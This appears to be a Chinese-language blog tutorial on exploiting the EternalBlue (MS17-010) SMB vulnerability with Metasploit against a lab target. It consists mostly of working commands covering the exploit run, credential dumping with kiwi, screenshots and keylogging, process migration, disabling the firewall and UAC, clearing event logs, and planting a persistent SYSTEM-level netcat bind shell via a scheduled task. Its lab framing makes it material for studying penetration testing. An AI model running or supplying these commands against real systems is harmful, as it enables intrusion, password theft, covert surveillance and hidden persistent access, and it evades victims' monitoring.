目录
没有更新的日子 小主在忙着制作项目 所以就耽搁了几天 话不多说 开始介绍这个很强大的漏洞:永恒之蓝
什么是永恒之蓝:
永恒之蓝:通过TCP的445和139端口,利用SMB远程代码执行漏洞,攻击者可以在目标系统上执行任意代码
漏洞扫描
这里推荐的工具是openvas 和 nessus (小主用的是openvas)
漏洞利用
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
// eternalblue攻击脚本, scanner检测脚本
msf6 > use 0
//使用 0 模块(前面对应的编号)
msf6 > set rhosts 192.168.10.142
//这里填写靶机的IP地址
msf6 > run
//运行
后渗透阶段
获取密码 获取屏幕
meterpreter > load kiwi //加载kiwi模块
meterpreter > creds_all //检测所有凭证,该命令可以列举系统中的明文密码
meterpreter > screenshot //屏幕截图
meterpreter > screenshare //屏幕共享
meterpreter > run post/windows/capture/keylog_recorder //开启键盘记录后渗透脚本
提权操作
meterpreter > ps //查看进程列表
meterpreter > getpid //查看自己的PID
meterpreter > ps -S explorer //查找explorer进程(用户权限大、不易被结束)
meterpreter > migrate 2652 //迁移进程到explorer,稳定,隐蔽,权限高
meterpreter > getuid //具有administrator身份
防火墙配置
meterpreter > shell //获取shell权限
C:\Windows\system32> chcp 65001 //消除乱码
C:\Windows\system32> netsh advfirewall set allprofiles state off
C:\Windows\system32> netsh advfirewall set allprofiles state on
//开启高级防火墙的所有的profiles设置
C:\Windows\system32> netsh firewall add portopening tcp 444 backdoor enable all
防火墙 添加 开启端口 协议 端口 名字 启用
关闭uac
c:\windows\system>
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
//这条命令比较长 建议各位友友直接复制粘贴
在 meterpreter 下清除日志(渗透测试下这步操作就省略)
c:\windows\system> exit // 退出win2008 cmd命令行终端
meterpreter > clearev //擦除windows 事件查看器
持久性后门
meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32 //上传nc到目标主机
meterpreter > ls nc.exe //查看上传结果及权限
100777/rwxrwxrwx 59392 fil 2023-03-09 17:25:27 +0800 nc.exe
(权限不够就赋予权限)
注册表开机自启
meterpreter > shell //进入命令提示符
C:\Windows\system32>chcp 65001 //消除乱码
chcp 65001
C:\Windows\system32>
schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe" /sc onstart
创建 指定名称 执行的用户 指定运行程序的位置 开启端口号
开机时执行
schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe"
/sc onstart
SUCCESS: The scheduled task "nc" has successfully been created. //设置开机自启计划任务
C:\Windows\system32>
schtasks:scheduled tasks 计划任务
/create:创建
/tn: task name 任务名称
/ru:run name 运行用户
system:系统用户
/tr:task run 任务执行的操作
-Ldp:Listen and port 监听 端口
-e:execute 执行
/sc:schedule 计划任务 表示计划任务触发的时机
onstart:开机
整个命令含义
schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe"
/sc onstart
表示:
使用计划任务(schtasks)实用程序创建一个名为"nc"的新任务,
以系统权限运行,在系统启动时执行,并执行位于"c:\windows\system32\nc.exe"的"netcat"程序,
监听端口444并在接收到连接时执行命令提示符。
验证
重启win2008
C:\Users\Administrator> netstat -an //查找444端口
ctrl + shift + Esc打开任务管理器,在进程中查看有没有nc.exe
[root@kali ~] nc 192.168.10.142 444
C:\Windows\system32> //成功进入到目标主机命令行